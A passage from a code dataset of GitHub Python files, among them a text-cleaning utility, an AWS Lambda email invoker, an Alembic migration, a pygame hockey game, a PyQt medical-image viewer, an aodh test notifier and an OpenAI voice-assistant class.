text)\n text = re.sub(\"(<|>|#)\", \" \", text)\n \n # Removing time\n text = re.sub('([\\d]+:\\d\\d) (AM|PM)', \"\", text)\n # Removing date\n text = re.sub('([\\d]+/[\\d]+/[\\d]+)', \"\", text)\n text = re.sub('([\\d]+\\.[\\d]+\\.[\\d]+)', \"\", text)\n text = re.sub('(Monday|Tuesday|Wednesday|Thursday|Friday|Saturday|Sunday){0,1},? (January|February|March|April|May|June|July|August|September|October|November|December){0,} [\\d]*,? ?[\\d]*', \" \", text)\n # Removing labels\n text = re.sub('(From:|To:|Sent:|Cc:|cc:|Bcc:|RE:|Re:|FWD:|Subject:|Original Message)', \"\", text)\n # Removing urls\n text = re.sub('https?:\\/\\/.*? 
', '', text)\n # Removing punctuations\n text = re.sub('[;\\,\\?\\.\\:\\!]', \" \", text)\n # Removing numbers\n text = re.sub('(0|1|2|3|4|5|6|7|8|9){1,}', \"\", text)\n # Removing email address\n \n # Removing rest\n text = re.sub('[/@]', \" \", text)\n text = re.sub(\"'s\", \"\", text)\n text = re.sub(\"\\'\", \"\", text)\n text = re.sub(\"\\|\", \"\", text)\n text = re.sub(\"\\[image\\]\", \"\", text)\n # Removing stop words\n with open(SETTINGS.stop_words_file) as f: # context manager so the file is always closed\n stop_words = f.read().splitlines()\n text = \" \".join(word for word in text.split() if word.lower() not in stop_words)\n\n \n return text","repo_name":"amateurCoder/ComplianceBot","sub_path":"complianceBot/code/DataIndexing/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28851787308","text":"import json\nimport requests\n\ndef lambda_handler(event, context):\n to_address = event['to_address']\n message = event['message']\n subject = event['subject']\n\n url = \"https://.execute-api.us-west-2.amazonaws.com//\" # Invoke url for the api\n params = {'to_address': to_address, 'message': message, 'subject': subject}\n resp = requests.get(url, params=params)\n return resp.status_code","repo_name":"paulang1807/code-snippets","sub_path":"aws/lambda_ses_email_invoke_sample.py","file_name":"lambda_ses_email_invoke_sample.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23560530370","text":"\"\"\"add skills table\n\nRevision ID: ee611766a455\nRevises: caabe4a750bf\nCreate Date: 2018-07-10 21:56:17.020078\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ee611766a455'\ndown_revision = 'caabe4a750bf'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('skills',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_skill', sa.String(length=128), nullable=True),\n sa.Column('second_skill', sa.String(length=128), nullable=True),\n sa.Column('third_skill', sa.String(length=128), nullable=True),\n sa.Column('fourth_skill', sa.String(length=128), nullable=True),\n sa.Column('fifth_skill', sa.String(length=128), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('skills')\n # ### end Alembic commands ###\n","repo_name":"mybestnickname/flask_project","sub_path":"migrations/versions/ee611766a455_add_skills_table.py","file_name":"ee611766a455_add_skills_table.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6217145422","text":"import pygame as pg\nimport sys\n\n\nclass Screen:\n def __init__(self, title, wh):\n pg.display.set_caption(title)\n self.sfc = pg.display.set_mode(wh) # Surface\n self.rct = self.sfc.get_rect() # Rect\n self.bgi_sfc = pg.Surface((1600,900)) # Surface\n pg.draw.rect(self.bgi_sfc, (0,0,0), (0,0,1600,900)) # Rect for the black background\n self.bgi_rct = self.bgi_sfc.get_rect() # Rect\n\n def blit(self):\n self.sfc.blit(self.bgi_sfc, self.bgi_rct)\n\n\nclass Ball:\n def __init__(self, color, size, vxy, scr: Screen):\n self.sfc = pg.Surface((2*size, 2*size)) # Surface\n self.sfc.set_colorkey((0, 0, 0)) \n pg.draw.circle(self.sfc, color, (size, size), size)\n self.rct = self.sfc.get_rect() # Rect\n self.rct.centerx = scr.rct.width//2\n self.rct.centery = scr.rct.height//2 \n self.vx, self.vy = vxy # starts from the center of the screen\n\n def blit(self, scr: Screen):\n scr.sfc.blit(self.sfc, self.rct)\n\n def update(self, scr: Screen):\n self.rct.move_ip(self.vx, self.vy)\n yoko, tate = check_bound(self.rct, scr.rct)\n self.vx *= yoko\n self.vy *= tate \n self.blit(scr) \n\n\nclass Bar: # class for the bar (paddle) that deflects the ball\n def __init__(self, color, xy):\n self.sfc = pg.Surface((40,300)) #Surface\n self.sfc.convert()\n self.sfc.fill(color) # fill with the specified color\n self.rct = self.sfc.get_rect()\n self.rct.center = xy\n \n def blit(self, scr:Screen):\n scr.sfc.blit(self.sfc, self.rct)\n \n def update(self, scr: Screen): # moves with the up and down keys\n key_states = pg.key.get_pressed() # dict of key states\n if key_states[pg.K_UP]: \n self.rct.centery -= 1\n if key_states[pg.K_DOWN]: \n self.rct.centery += 1\n if check_bound(self.rct, scr.rct) != (1, 1): # if out of bounds\n if key_states[pg.K_UP]: \n self.rct.centery += 1\n if key_states[pg.K_DOWN]: \n self.rct.centery -= 1\n self.blit(scr)\n\n def update2(self, scr: Screen): # moves with the w and s keys\n key_states = pg.key.get_pressed() # dict of key states\n if key_states[pg.K_w]: \n self.rct.centery -= 1\n if key_states[pg.K_s]: \n self.rct.centery += 1\n if check_bound(self.rct, scr.rct) != (1, 1): # if out of bounds\n if key_states[pg.K_w]: \n self.rct.centery += 1\n if key_states[pg.K_s]: \n self.rct.centery -= 1\n self.blit(scr)\n\n\nclass Score: # score class\n def __init__(self, score1, score2):\n self.fonto = pg.font.Font(None, 100)\n self.txt = self.fonto.render(f\"{score2} {score1}\", True, (255,255,255)) # display the score in white\n\n def blit(self, scr: Screen):\n scr.sfc.blit(self.txt,(scr.rct.width//2-50,50)) \n\n def update(self, scr: Screen):\n self.blit(scr)\n\n\n\ndef main():\n clock = pg.time.Clock()\n scr = Screen(\"Hockey Game\", (1600, 900))\n bar1 = Bar((0,255,0), (scr.rct.width-21, scr.rct.height//2))\n bar2 = Bar((0,0,255), (21, scr.rct.height//2))\n bll = Ball((255,0,0), 25, (2.5,2.5), scr)\n score1 = 0\n score2 = 0\n \n while True:\n sb = Score(score1, score2)\n scr.blit()\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n return\n\n if bar1.rct.colliderect(bll.rct):\n bll.vx*= -1\n if bar2.rct.colliderect(bll.rct):\n bll.vx*= -1\n if bll.rct.centerx < 25:\n score1+=1\n if bll.rct.centerx > scr.rct.width-25:\n score2+=1\n if score1>=5 and score1-score2 >=2:\n return \n elif score2>=5 and score2-score1 >=2:\n return\n bll.update(scr)\n bar1.update(scr)\n bar2.update2(scr)\n sb.update(scr)\n 
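# all sprites are drawn for this frame; refresh the window contents\n 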
pg.display.update()\n clock.tick(1000)\n\n\ndef check_bound(rct, scr_rct):\n '''\n [1] rct: Rect of the character (koukaton) or a bomb\n [2] scr_rct: Rect of the screen\n '''\n yoko, tate = +1, +1 # inside the area\n if rct.left < scr_rct.left or scr_rct.right < rct.right : yoko = -1 # outside the area\n if rct.top < scr_rct.top or scr_rct.bottom < rct.bottom: tate = -1 # outside the area\n return yoko, tate\n\n\nif __name__ == \"__main__\":\n pg.init()\n main()\n pg.quit()\n sys.exit()","repo_name":"c0a21098/ProjExD","sub_path":"ex06/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"19613450326","text":"from __future__ import absolute_import, print_function\n\nimport os\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QHBoxLayout, QMessageBox, QToolButton # QMessageBox lives in QtWidgets, not QtGui\nfrom soma.qt_gui.qt_backend import Qt, QtCore\n\nfrom populse_mia.data_manager.project import COLLECTION_CURRENT, TAG_FILENAME\nfrom populse_mia.software_properties import Config\nfrom populse_mia.user_interface.data_browser.data_browser import (\n TableDataBrowser,\n)\nfrom populse_mia.user_interface.data_browser.rapid_search import RapidSearch\nfrom populse_mia.user_interface.data_viewer.anatomist_2 import ( # noqa: F401\n resources,\n)\nfrom populse_mia.user_interface.data_viewer.anatomist_2.anasimpleviewer2 import ( # noqa: E501\n AnaSimpleViewer2,\n)\n\nfrom ..data_viewer import DataViewer\n\nnot_defined_value = \"*Not Defined*\"\n\n\nclass MiaViewer(Qt.QWidget, DataViewer):\n \"\"\"\n :class:`MIA data viewer\n `\n implementation based on\n `PyAnatomist `_\n\n .. Methods:\n - close: Exit\n - display_files: Load objects in files and display\n - displayed_files: Get the list of displayed files\n - filter_documents: Filter documents already loaded in the Databrowser\n - preferences: Preferences for the dataviewer\n - remove_files: Delete the given objects given by their file names\n - reset_search_bar: Reset the rapid search bar\n - screenshot: The screenshot of mia_anatomist_2\n - search_str: Update the \"*Not Defined*\" values in visualised documents\n - set_documents: Initialise current documents in the viewer\n\n \"\"\"\n\n def __init__(self, init_global_handlers=None):\n super(MiaViewer, self).__init__()\n\n self.anaviewer = AnaSimpleViewer2(init_global_handlers)\n\n # count global number of viewers using anatomist, in order to close it\n # nicely\n if not hasattr(DataViewer, \"mia_viewers\"):\n DataViewer.mia_viewers = 0\n DataViewer.mia_viewers += 1\n\n def findChild(x, y):\n return Qt.QObject.findChild(x, Qt.QObject, y)\n\n awidget = self.anaviewer.awidget\n filter_action = findChild(awidget, \"filterAction\")\n preferences_action = findChild(awidget, \"actionPreferences\")\n screenshot_action = findChild(awidget, \"actionprint_view\")\n\n filter_action.triggered.connect(self.filter_documents)\n preferences_action.triggered.connect(self.preferences)\n screenshot_action.triggered.connect(self.screenshot)\n\n layout = Qt.QVBoxLayout()\n self.setLayout(layout)\n self.anaviewer.awidget.setSizePolicy(\n Qt.QSizePolicy.Expanding, Qt.QSizePolicy.Expanding\n )\n layout.addWidget(self.anaviewer.awidget)\n\n self.project = None\n self.documents = []\n self.displayed = []\n self.table_data = []\n\n def close(self):\n \"\"\"Exit\"\"\"\n super(MiaViewer, self).close()\n close_ana = False\n DataViewer.mia_viewers -= 1 # dec count\n if DataViewer.mia_viewers == 0:\n close_ana = True\n self.anaviewer.closeAll(close_ana)\n\n def display_files(self, files):\n \"\"\"Load 
objects in files and display\"\"\"\n self.displayed += files\n self.anaviewer.loadObject(files)\n\n def displayed_files(self):\n \"\"\"Get the list of displayed files\"\"\"\n return self.displayed\n\n def filter_documents(self):\n \"\"\"Filter documents already loaded in the Databrowser\"\"\"\n dialog = Qt.QDialog()\n dialog.setWindowTitle(\"Filter documents\")\n dialog.resize(1150, 500)\n layout = Qt.QVBoxLayout()\n dialog.setLayout(layout)\n\n # Some specific filtering\n # QLineEdit for the search input\n self.search_bar = RapidSearch(dialog)\n self.search_bar.textChanged.connect(self.search_str)\n # Cancel search button\n sources_images_dir = Config().getSourceImageDir()\n button_cross = QToolButton()\n button_cross.setStyleSheet(\"background-color:rgb(255, 255, 255);\")\n button_cross.setIcon(\n QIcon(os.path.join(sources_images_dir, \"gray_cross.png\"))\n )\n button_cross.clicked.connect(self.reset_search_bar)\n\n title = Qt.QLabel()\n title.setText(\"Search by FileName: \")\n\n layout.addWidget(title)\n\n search_bar_layout = QHBoxLayout()\n search_bar_layout.addWidget(self.search_bar)\n search_bar_layout.addSpacing(3)\n search_bar_layout.addWidget(button_cross)\n # Add layout to dialogBox\n layout.addLayout(search_bar_layout)\n layout.addSpacing(8)\n\n self.table_data = TableDataBrowser(\n self.project,\n self,\n self.project.session.get_shown_tags(),\n False,\n True,\n link_viewer=False,\n )\n layout.addWidget(self.table_data)\n hlay = Qt.QHBoxLayout()\n layout.addLayout(hlay)\n ok = Qt.QPushButton(\"Import\")\n hlay.addWidget(ok)\n ok.clicked.connect(dialog.accept)\n ok.setDefault(True)\n cancel = Qt.QPushButton(\"Cancel\")\n hlay.addWidget(cancel)\n cancel.clicked.connect(dialog.reject)\n hlay.addStretch(1)\n\n # Reducing the list of scans to selection\n all_scans = self.table_data.scans_to_visualize\n self.table_data.scans_to_visualize = self.documents\n self.table_data.scans_to_search = self.documents\n self.table_data.update_visualized_rows(all_scans)\n\n res = dialog.exec_()\n if res == Qt.QDialog.Accepted:\n points = self.table_data.selectedIndexes()\n result_names = []\n for point in points:\n row = point.row()\n # We get the FileName of the scan from the first column\n scan_name = self.table_data.item(row, 0).text()\n value = self.project.session.get_value(\n COLLECTION_CURRENT, scan_name, TAG_FILENAME\n )\n value = os.path.abspath(\n os.path.join(self.project.folder, value)\n )\n result_names.append(value)\n self.display_files(result_names)\n\n def preferences(self):\n \"\"\"Preferences for the dataviewer\"\"\"\n # Get initial config:\n im_sec = Config().getViewerFramerate()\n config = Config().getViewerConfig()\n ref = Config().get_referential()\n\n dialog = Qt.QDialog()\n dialog.setWindowTitle(\"Preferences\")\n dialog.resize(600, 400)\n layout = Qt.QVBoxLayout()\n layout.setContentsMargins(25, 25, 25, 25)\n dialog.setLayout(layout)\n\n # Change Neuro/Radio configuration\n config_layout = QHBoxLayout()\n title_config = Qt.QLabel()\n title_config.setText(\"Configuration: \")\n box = Qt.QComboBox()\n box.addItem(\"Neuro\")\n box.addItem(\"Radio\")\n config_layout.addWidget(title_config)\n config_layout.addWidget(box)\n if config == \"radio\":\n box.setCurrentIndex(1)\n\n # set automatic time frame rate\n frame_rate_layout = QHBoxLayout()\n title = Qt.QLabel()\n title.setText(\"Automatic time image display:\")\n slider = Qt.QSlider(Qt.Qt.Horizontal)\n slider.setRange(1, 100)\n slider.setValue(int(im_sec))\n size = QtCore.QSize(180, 15)\n slider.setMinimumSize(size)\n slow_label = 
Qt.QLabel()\n fast_label = Qt.QLabel()\n slow_label.setText(\"slow\")\n fast_label.setText(\"fast\")\n frame_rate_layout.addWidget(title)\n frame_rate_layout.addWidget(slow_label)\n frame_rate_layout.addWidget(slider)\n frame_rate_layout.addWidget(fast_label)\n frame_rate_layout.insertSpacing(1, 200)\n\n # Change referential\n ref_layout = QHBoxLayout()\n title_ref = Qt.QLabel()\n title_ref.setText(\"Referential: \")\n box2 = Qt.QComboBox()\n box2.addItem(\"World Coordinates\")\n box2.addItem(\"Image referential\")\n ref_layout.addWidget(title_ref)\n ref_layout.addWidget(box2)\n box2.setCurrentIndex(int(ref))\n\n # Set general vertical layout\n layout.addLayout(config_layout)\n layout.addLayout(frame_rate_layout)\n layout.addLayout(ref_layout)\n layout.addStretch(1)\n\n # Save and cancel buttons\n hlay = Qt.QHBoxLayout()\n layout.addLayout(hlay)\n ok = Qt.QPushButton(\"Save\")\n hlay.addStretch(1)\n hlay.addWidget(ok)\n ok.clicked.connect(dialog.accept)\n ok.setDefault(True)\n cancel = Qt.QPushButton(\"Cancel\")\n hlay.addWidget(cancel)\n cancel.clicked.connect(dialog.reject)\n hlay.addStretch(1)\n\n res = dialog.exec_()\n\n if res == Qt.QDialog.Accepted:\n new_config = box.currentText().lower()\n new_ref = box2.currentIndex()\n\n # Save Config parameters and reload images\n # when config and referential have changed\n Config().setViewerFramerate(slider.value())\n Config().setViewerConfig(new_config)\n Config().set_referential(new_ref)\n if new_config != config:\n self.anaviewer.changeConfig(new_config)\n if new_ref != ref:\n self.anaviewer.changeRef()\n\n def remove_files(self, files):\n \"\"\"Delete the objects given by their file names\"\"\"\n self.anaviewer.deleteObjectsFromFiles(files)\n self.displayed = [doc for doc in self.displayed if doc not in files] # keep the displayed list in sync\n\n def reset_search_bar(self):\n \"\"\"Reset the rapid search bar\"\"\"\n self.search_bar.setText(\"\")\n\n def screenshot(self):\n \"\"\"The screenshot of mia_anatomist_2\"\"\"\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n msg.setText(\"Not yet implemented!\")\n msg.setWindowTitle(\"Information\")\n msg.setStandardButtons(QMessageBox.Ok)\n msg.buttonClicked.connect(msg.close)\n msg.exec()\n\n def search_str(self, str_search):\n \"\"\"Search a string in the table and update the\n \"*Not Defined*\" values in visualized documents.\n\n :param str_search: string to search\n \"\"\"\n\n old_scan_list = self.table_data.scans_to_visualize\n return_list = []\n\n # Every scan taken if empty search\n if str_search == \"\":\n return_list = self.table_data.scans_to_search\n else:\n # Scans with at least a not defined value\n if str_search == not_defined_value:\n filter = self.search_bar.prepare_not_defined_filter(\n self.project.session.get_shown_tags()\n )\n # Scans matching the search\n else:\n filter = self.search_bar.prepare_filter(\n str_search,\n self.project.session.get_shown_tags(),\n self.table_data.scans_to_search,\n )\n\n generator = self.project.session.filter_documents(\n COLLECTION_CURRENT, filter\n )\n\n # Creating the list of scans\n return_list = [getattr(scan, TAG_FILENAME) for scan in generator]\n\n self.table_data.scans_to_visualize = return_list\n\n # Rows updated\n self.table_data.update_visualized_rows(old_scan_list)\n\n self.project.currentFilter.search_bar = str_search\n\n def set_documents(self, project, documents):\n \"\"\"Initialise current documents in the viewer\"\"\"\n if self.project is not project:\n self.clear()\n self.project = project\n self.documents = 
documents\n","repo_name":"populse/populse_mia","sub_path":"populse_mia/user_interface/data_viewer/anatomist_2/mia_anatomist.py","file_name":"mia_anatomist.py","file_ext":"py","file_size_in_byte":11760,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"9366576002","text":"from aodh import notifier\n\n\nclass TestAlarmNotifier(notifier.AlarmNotifier):\n \"Test alarm notifier.\"\"\"\n\n def __init__(self, conf):\n super(TestAlarmNotifier, self).__init__(conf)\n self.notifications = []\n\n def notify(self, action, alarm_id, alarm_name, severity,\n previous, current, reason, reason_data):\n self.notifications.append((action,\n alarm_id,\n alarm_name,\n severity,\n previous,\n current,\n reason,\n reason_data))\n","repo_name":"openstack/aodh","sub_path":"aodh/notifier/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"16926802","text":"import os\nimport openai\nfrom cortana.model.text_to_audio import text_to_speech_pyttsx3, text_to_speech_gtts\nfrom cortana.model.audio_to_text import speech_to_text_google, wait_for_call\nfrom cortana.model.predefined_answers import predefined_answers, text_command_detector\n\nclass cortana():\n def __init__(self, model_name, language='english', role=None, api_key=None,):\n print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\n print(f' Cortana ({language})')\n print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\n if api_key is None or api_key=='':\n from api_key import secret_key\n openai.api_key = secret_key\n else:\n openai.api_key = api_key\n # Model to use\n self.model_name = model_name\n \n # Option of voice\n self.option_talk = None\n self.name = None\n self.language = language\n\n # Initialize \n self.answers = predefined_answers[language]\n self.reset_messages(role)\n self.log = None\n\n\n @staticmethod\n def list_model():\n print(openai.Model.list())\n\n def change_model(self, model_name):\n self.model_name = model_name\n\n def prompt(self, input_, max_tokens=20, temperature=0.4, **kwargs):\n # Parameters\n print_ = kwargs.get('print', True)\n if not isinstance(input_, str):\n raise Exception(f'input must be of type str, currently is {type(input_)}')\n else:\n self.last_input = input_\n \n # Update message list\n self.messages.append({'role':'user', \"content\":self.last_input})\n \n # ChatCompletion\n completion = openai.ChatCompletion.create(model=self.model_name,\n messages=self.messages,\n max_tokens=max_tokens,\n temperature=temperature,\n **kwargs)\n answer = completion.choices[0].message[\"content\"]\n \n # Update messages\n self.messages.append({'role':'assistant', \"content\":answer})\n self.log = completion\n self.last_answer = answer\n \n # Print\n if print_:\n print('----------------------')\n pronoun = self.answers['pronoun']\n print(f'{pronoun}: {self.last_input}')\n print('----------------------')\n print(f'Cortana: {self.last_answer}')\n print('****************************')\n \n def voice_cortana(self, text, option_talk='pyttsx3', **kwargs):\n if self.option_talk is None:\n self.option_talk = option_talk\n \n if self.option_talk==\"pyttsx3\":\n if self.name is None:\n self.name = kwargs.get('name', 'Zira')\n text_to_speech_pyttsx3(text, self.name)\n elif self.option_talk==\"gtts\":\n if self.language == 'english':\n language = 'en'\n elif self.language == 'french':\n language = 'fr'\n 
text_to_speech_gtts(text, language=language)\n \n def listen_cortana(self, *args, option_talk=\"pyttsx3\", **kwargs):\n self.prompt(*args, **kwargs)\n self.voice_cortana(self.last_answer, option_talk, **kwargs)\n \n def cortana_listen(self):\n if self.language == 'english':\n language = 'en-US'\n elif self.language == 'french':\n language = 'fr-FR'\n success=False\n counter=0\n while not success and counter<2:\n counter+=1 # Increment counter\n print(self.answers['listening'])\n response = speech_to_text_google(language)\n success = response['success']\n if success:\n text = response['transcription']\n else:\n text = self.answers['error']\n self.voice_cortana(text)\n text = None\n if response['error'] is not None:\n text = None\n return text, success\n \n def talk_with_cortana(self, *args, **kwargs):\n \n # Language selector\n if self.language == 'english':\n language = 'en-US'\n elif self.language == 'french':\n language = 'fr-FR'\n # For French you must choose Google text-to-speech\n if kwargs.get('option_talk', 'gtts') != 'gtts':\n kwargs['option_talk'] = 'gtts'\n \n # Welcoming message\n self.voice_cortana(self.answers['text_start'], **kwargs)\n condition = True\n while condition:\n # Get the text from your audio speech\n text, success = self.cortana_listen()\n \n # Check if a specific command has been used\n if text is not None:\n command = text_command_detector(text, self.language)\n else:\n command = None\n \n # Send the text to cortana\n if (command is None) and (text is not None and success):\n self.listen_cortana(text, *args, **kwargs) \n # Put cortana in pause\n elif (command =='activated_pause') or (text is None):\n self.voice_cortana(self.answers['text_idle'], **kwargs)\n condition = wait_for_call('Cortana', self.answers['commands']['idle_quit'], language)\n if condition:\n self.voice_cortana(self.answers['response'], **kwargs)\n # Shut down cortana\n elif command =='activated_quit':\n condition = False\n self.voice_cortana(self.answers['text_close'])\n print(' ---- Protocol Terminated ----')\n\n def show_log(self):\n print(self.log)\n \n def reset_messages(self, role=None):\n if role is None:\n role = self.answers['role']\n self.messages=[{'role': \"system\", \"content\":role}]\n\ndef button_click(language, api_key=None, max_tokens=200, option_talk='gtts'):\n name = \"gpt-3.5-turbo\"\n my_cortana = cortana(name, language, api_key=api_key) \n my_cortana.talk_with_cortana(max_tokens=max_tokens, option_talk=option_talk)\n\n\n","repo_name":"ManuNeuro/cortana","sub_path":"model/cortana_class.py","file_name":"cortana_class.py","file_ext":"py","file_size_in_byte":6225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11598931582","text":"from .radarpolar_extract import extract_polar_data\n\n\ndef extractRadarPolar(\n dirMdvDate,\n start_time,\n end_time,\n fields,\n points,\n sweeps=-1,\n pia=None,\n dbz_fields=None,\n filter=None,\n filter_fields=None,\n apply_cmd=False,\n time_zone=\"Africa/Kigali\",\n):\n \"\"\"\n Extract radar polar data over given points.\n\n Parameters\n ----------\n dirMdvDate: string\n full path to the folder containing the date folders of the MDV files\n start_time: string\n The start time, in the same time zone as \"time_zone\", format \"YYYY-mm-dd HH:MM\"\n end_time: string\n The end time, in the same time zone as \"time_zone\", format \"YYYY-mm-dd HH:MM\"\n fields: list\n List of the fields to extract\n points: list of dictionary\n A list of dictionaries of the points to extract, in the format\n [{\"id\": 
\"id_point1\", \"longitude\": value_lon, \"latitude\": value_lat}, {...}, ...]\n sweeps: integer or list of integer\n A list of the index of elevation angles to be extracted in integer, or -1 to extract all available elevation angles\n pia: dictionary or None\n Dictionary of the method and parameters to use to perform an attenuation correction\n for the reflectivity fields before extraction.\n Default None, no attenuation correction performed.\n dbz_fields: list or None\n List of reflectivity fields to correct the attenuation. Must be in \"fields\". Default None\n filter: dictionary\n Dictionary of the method and parameters to use to filter the fields before extraction.\n Default None, no filter applied.\n filter_fields: list or None\n List of fields in which the filter will be applied. Must be in \"fields\". Default None\n apply_cmd: boolean\n Apply clutter mitigation decision to the fields. Default False\n time_zone: string\n The time zone of \"start_time\", \"end_time\" and the output extracted data.\n Options: \"Africa/Kigali\" or \"UTC\". Default \"Africa/Kigali\"\n\n Returns\n -------\n Return a dictionary of\n points: the original points used to extract the data\n date: list of dates of the extracted data\n elevation_angle: list of the elevation angles of the extracted data\n data: dictionary of longitude, latitude, altitude and the fields in the form of 3d list\n dimension: (len(date) x len(elevation_angle) x len(points))\n \"\"\"\n\n if pia is not None:\n if pia[\"method\"] == \"kdp\":\n pia_pars = {\"gamma\": 0.8}\n if \"pars\" in pia:\n if \"gamma\" in pia[\"pars\"]:\n pia_pars[\"gamma\"] = pia[\"pars\"][\"gamma\"]\n else:\n pia_pars = {\n \"a_max\": 0.0002,\n \"a_min\": 0,\n \"n_a\": 10,\n \"b_max\": 0.7,\n \"b_min\": 0.65,\n \"n_b\": 6,\n \"sector_thr\": 10,\n \"constraints\": \"none\",\n }\n\n if \"pars\" in pia:\n if \"constraints\" in pia[\"pars\"]:\n pia_pars[\"constraints\"] = pia[\"pars\"][\"constraints\"]\n\n if pia[\"pars\"][\"constraints\"] == \"dbz\":\n if \"constraint_args_dbz\" in pia[\"pars\"]:\n pia_pars[\"constraint_args_dbz\"] = pia[\"pars\"][\n \"constraint_args_dbz\"\n ]\n else:\n pia_pars[\"constraint_args_dbz\"] = 60\n\n if pia[\"pars\"][\"constraints\"] == \"pia\":\n if \"constraint_args_pia\" in pia[\"pars\"]:\n pia_pars[\"constraint_args_pia\"] = pia[\"pars\"][\n \"constraint_args_pia\"\n ]\n else:\n pia_pars[\"constraint_args_pia\"] = 20\n\n if pia[\"pars\"][\"constraints\"] == \"both\":\n if \"constraint_args_dbz\" in pia[\"pars\"]:\n pia_pars[\"constraint_args_dbz\"] = pia[\"pars\"][\n \"constraint_args_dbz\"\n ]\n else:\n pia_pars[\"constraint_args_dbz\"] = 60\n\n if \"constraint_args_pia\" in pia[\"pars\"]:\n pia_pars[\"constraint_args_pia\"] = pia[\"pars\"][\n \"constraint_args_pia\"\n ]\n else:\n pia_pars[\"constraint_args_pia\"] = 20\n\n d_name = [\n \"a_max\",\n \"a_min\",\n \"n_a\",\n \"b_max\",\n \"b_min\",\n \"n_b\",\n \"sector_thr\",\n ]\n p_name = list(pia[\"pars\"].keys())\n inm = [x in d_name for x in pia[\"pars\"]]\n if any(inm):\n p_name = [i for (i, v) in zip(p_name, inm) if v]\n for n in p_name:\n pia_pars[n] = pia[\"pars\"][n]\n\n pia[\"pars\"] = pia_pars\n\n #######\n if filter is not None:\n if filter[\"method\"] == \"median_filter_censor\":\n filter_pars = {\n \"median_filter_len\": 5,\n \"minsize_seq\": 3,\n \"censor_field\": \"RHOHV\",\n \"censor_thres\": 0.8,\n }\n elif filter[\"method\"] == \"median_filter\":\n filter_pars = {\"median_filter_len\": 5, \"minsize_seq\": 3}\n else:\n filter_pars = {\"window_len\": 5, \"window\": 
\"hanning\"}\n\n ##\n d_name = list(filter_pars.keys())\n if \"pars\" in filter:\n f_name = list(filter[\"pars\"].keys())\n inm = [x in d_name for x in f_name]\n if any(inm):\n f_name1 = [i for (i, v) in zip(f_name, inm) if v]\n for n in f_name1:\n filter_pars[n] = filter[\"pars\"][n]\n\n if filter[\"method\"] == \"median_filter_censor\":\n if \"censor_field\" in f_name:\n if \"censor_thres\" not in f_name:\n if filter[\"pars\"][\"censor_field\"] == \"RHOHV\":\n filter_pars[\"censor_thres\"] = 0.8\n elif filter[\"pars\"][\"censor_field\"] == \"NCP\":\n filter_pars[\"censor_thres\"] = 0.5\n else:\n filter_pars[\"censor_thres\"] = 3\n\n ##\n filter[\"pars\"] = filter_pars\n\n #######\n\n return extract_polar_data(\n dirMDV=dirMdvDate,\n source=None,\n start_time=start_time,\n end_time=end_time,\n fields=fields,\n points=points,\n sweeps=sweeps,\n pia=pia,\n dbz_fields=dbz_fields,\n filter=filter,\n filter_fields=filter_fields,\n apply_cmd=apply_cmd,\n time_zone=time_zone,\n )\n\n\ndef polarExtractedTable(x):\n \"\"\"\n Convert to table extracted radar polar data.\n\n Parameters\n ----------\n x: dictionary\n Output from extractRadarPolar\n Returns\n -------\n A list of dictionaries\n \"\"\"\n var = list(x[\"data\"].keys())\n\n out = list()\n for p in range(len(x[\"coords\"])):\n for e in range(len(x[\"elevation_angle\"])):\n for d in range(len(x[\"date\"])):\n pt = x[\"coords\"][p]\n tab = {\n \"points_id\": pt[\"id\"],\n \"points_longitude\": pt[\"longitude\"],\n \"points_latitude\": pt[\"latitude\"],\n \"dates\": x[\"date\"][d],\n \"elevation_angle\": x[\"elevation_angle\"][e],\n }\n for v in var:\n tab[v] = x[\"data\"][v][d][e][p]\n out = out + [tab]\n\n return out\n","repo_name":"rijaf-iri/mtorwaradar","sub_path":"mtorwaradar/api/radarpolar_extract_loc.py","file_name":"radarpolar_extract_loc.py","file_ext":"py","file_size_in_byte":7827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70476586088","text":"#!/usr/bin/env python3\n\n# https://docs.faculty.ai/user-guide/apps/examples/dash_file_upload_download.html\n# https://www.roytuts.com/python-flask-rest-api-file-upload/\n\nimport base64\nimport os\nimport requests\nfrom urllib.parse import quote as urlquote\nfrom flask import Flask, send_from_directory, request\n#from flask_caching import Cache\nimport dash\nimport plotly.graph_objs as go\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\n\nUPLOAD_DIRECTORY = \"/data/\"\nif not os.path.exists(UPLOAD_DIRECTORY):\n os.makedirs(UPLOAD_DIRECTORY)\n\nIMAGES_DIRECTORY = UPLOAD_DIRECTORY+'images'\nif not os.path.exists(IMAGES_DIRECTORY):\n os.makedirs(IMAGES_DIRECTORY)\n 